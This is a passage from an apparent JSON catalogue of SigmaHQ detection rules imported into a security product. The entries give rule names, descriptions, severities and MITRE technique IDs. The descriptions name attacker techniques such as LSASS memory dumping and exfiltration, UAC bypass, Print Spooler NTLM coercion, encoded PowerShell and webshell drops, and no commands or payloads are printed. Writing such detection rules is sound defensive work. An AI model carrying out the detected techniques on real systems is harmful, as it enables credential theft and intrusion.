"SigmaHQ/sigma", "source_id": "bb2ba6fb-95d4-4a25-89fc-30bb736c021a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_powershell_dll_load.yml" } }, { "id": "sigmahq-sigma-bb382fd5-b454-47ea-a264-1828e4c766d6", "type": "detection", 
"name": "Shell Invocation via Apt - Linux", "description": "Detects the use of the \"apt\" and \"apt-get\" commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-invocation-via-apt-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb382fd5-b454-47ea-a264-1828e4c766d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml" } }, { "id": "sigmahq-sigma-bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "type": "detection", "name": "Suspicious Desktopimgdownldr Command", "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-desktopimgdownldr-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml" } }, { "id": "sigmahq-sigma-bb76d96b-821c-47cf-944b-7ce377864492", "type": "detection", "name": "Suspicious NTLM Authentication on the Printer Spooler Service", "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ntlm-authentication-on-the-printer-spooler-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb76d96b-821c-47cf-944b-7ce377864492", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml" } }, { "id": "sigmahq-sigma-bb780e0c-16cf-4383-8383-1e5471db6cf9", "type": "detection", "name": "Suspicious XOR Encoded PowerShell Command", "description": "Detects presence of a potentially xor encoded powershell command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1140", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-xor-encoded-powershell-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" } }, { "id": "sigmahq-sigma-bbb7e38c-0b41-4a11-b306-d2a457b7ac2b", "type": "detection", "name": "Suspicious File Created In PerfLogs", "description": "Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-in-perflogs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbb7e38c-0b41-4a11-b306-d2a457b7ac2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml" } }, { "id": "sigmahq-sigma-bbb80e91-5746-4fbe-8898-122e2cafdbf4", "type": "detection", "name": "Suspicious PowerShell Invocations - Generic - PowerShell Module", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-powershell-invocations-generic-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" } }, { "id": "sigmahq-sigma-bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "type": "detection", "name": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", "description": "Detects PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-policy-discovery-with-get-addefaultdomainpasswordpolicy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" } }, { "id": "sigmahq-sigma-bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "type": "detection", "name": "NtdllPipe Like Activity Execution", "description": "Detects commands that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR 
detection. As seen being used in the POC NtdllPipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntdllpipe-like-activity-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml" } }, { "id": "sigmahq-sigma-bbf59793-6efb-4fa1-95ca-a7d288e52c88", "type": "detection", "name": "Winlogon Notify Key Logon Persistence", "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winlogon-notify-key-logon-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" } }, { "id": "sigmahq-sigma-bc275be9-0bec-4d77-8c8f-281a2df6710f", "type": "detection", "name": "Windows Defender Malware And PUA Scanning Disabled", "description": "Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-malware-and-pua-scanning-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bc275be9-0bec-4d77-8c8f-281a2df6710f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml" } }, { "id": "sigmahq-sigma-bc2e25ed-b92b-4daa-b074-b502bdd1982b", "type": "detection", "name": "Local Privilege Escalation Indicator TabTip", "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-privilege-escalation-indicator-tabtip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml" } }, { "id": "sigmahq-sigma-bc3a4b0c-e167-48e1-aa88-b3020950e560", "type": "detection", "name": "Remote Printing Abuse for Lateral Movement", "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-printing-abuse-for-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bc3a4b0c-e167-48e1-aa88-b3020950e560", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" } }, { "id": "sigmahq-sigma-bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "type": "detection", "name": "Win Defender Restored Quarantine File", "description": "Detects the restoration of files from the defender quarantine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/win-defender-restored-quarantine-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml" } }, { "id": "sigmahq-sigma-bcfcc962-0e4a-4fd9-84bb-a833e672df3f", "type": "detection", "name": "Azure Virtual Network Modified or Deleted", "description": "Identifies when a Virtual Network is modified or deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-virtual-network-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-bcfece3d-56fe-4545-9931-3b8e92927db1", "type": "detection", "name": "Winrs Local Command Execution", "description": "Detects the execution of Winrs.exe where it is used to execute commands locally.\nCommands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.006", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/winrs-local-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bcfece3d-56fe-4545-9931-3b8e92927db1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrs_local_command_execution.yml" } }, { "id": "sigmahq-sigma-bd1212e5-78da-431e-95fa-c58e3237a8e6", "type": "detection", "name": "Suspicious ASPX File Drop by Exchange", "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-aspx-file-drop-by-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" } }, { "id": "sigmahq-sigma-bd132164-884a-48f1-aa2d-c6d646b04c69", "type": "detection", "name": "Microsoft 365 - Potential Ransomware Activity", "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-365-potential-ransomware-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd132164-884a-48f1-aa2d-c6d646b04c69", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml" } }, { "id": "sigmahq-sigma-bd1c6866-65fc-44b2-be51-5588fcff82b9", "type": "detection", "name": "Renamed Msdt.EXE Execution", "description": "Detects the execution of a renamed \"Msdt.exe\" binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-msdt-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" } }, { "id": "sigmahq-sigma-bd33d2aa-497e-4651-9893-5c5364646595", "type": "detection", "name": "Suspicious TCP Tunnel Via PowerShell Script", "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-tcp-tunnel-via-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd33d2aa-497e-4651-9893-5c5364646595", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" } }, { "id": "sigmahq-sigma-bd3b5eaa-439d-4a42-8f35-a49f5c8a2582", "type": "detection", "name": "Remote Access Tool - Renamed MeshAgent Execution - MacOS", "description": "Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\nRMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\nHowever, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-renamed-meshagent-execution-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd3b5eaa-439d-4a42-8f35-a49f5c8a2582", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml" } }, { "id": "sigmahq-sigma-bd5971a7-626d-46ab-8176-ed643f694f68", "type": "detection", "name": "Extracting Information with PowerShell", "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/extracting-information-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd5971a7-626d-46ab-8176-ed643f694f68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" } }, { "id": "sigmahq-sigma-bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "type": "detection", "name": "Group Membership Reconnaissance Via Whoami.EXE", "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/group-membership-reconnaissance-via-whoami-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml" } }, { "id": "sigmahq-sigma-bdc64095-d59a-42a2-8588-71fd9c9d9abc", "type": "detection", "name": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-unsigned-dbghelp-dbgcore-dll-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml" } }, { "id": "sigmahq-sigma-bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "type": "detection", "name": "UAC Bypass Using IEInstal - File", "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ieinstal-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" } }, { "id": "sigmahq-sigma-bde30855-5c53-4c18-ae90-1ff79ebc9578", "type": "detection", "name": "Okta User Session Start Via An Anonymising Proxy Service", "description": "Detects when an Okta user session starts where the user is behind an anonymising proxy service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-user-session-start-via-an-anonymising-proxy-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bde30855-5c53-4c18-ae90-1ff79ebc9578", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_user_session_start_via_anonymised_proxy.yml" } }, { "id": "sigmahq-sigma-bde47d4b-9987-405c-94c7-b080410e8ea7", "type": "detection", "name": "Clearing Windows Console History", "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clearing-windows-console-history.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bde47d4b-9987-405c-94c7-b080410e8ea7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" } }, { "id": "sigmahq-sigma-bdeb2cff-af74-4094-8426-724dc937f20a", "type": "detection", "name": "PowerShell Script Change Permission Via Set-Acl", "description": "Detects PowerShell execution to set the ACL of a file or a folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-change-permission-via-set-acl.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdeb2cff-af74-4094-8426-724dc937f20a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml" } }, { "id": "sigmahq-sigma-bdeeabc9-ff2a-4a51-be59-bb253aac7891", "type": "detection", "name": "PUA - Wsudo Suspicious Execution", "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-wsudo-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml" } }, { "id": "sigmahq-sigma-be2e3a5c-9cc7-4d02-842a-68e9cb26ec49", "type": "detection", "name": "JAMF MDM Execution", "description": "Detects execution of the \"jamf\" binary to create user accounts and run commands. 
For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jamf-mdm-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be2e3a5c-9cc7-4d02-842a-68e9cb26ec49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_jamf_usage.yml" } }, { "id": "sigmahq-sigma-be344333-921d-4c4d-8bb8-e584cf584780", "type": "detection", "name": "Potentially Suspicious Event Viewer Child Process", "description": "Detects uncommon or suspicious child processes of \"eventvwr.exe\" which might indicate a UAC bypass attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-event-viewer-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "be344333-921d-4c4d-8bb8-e584cf584780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 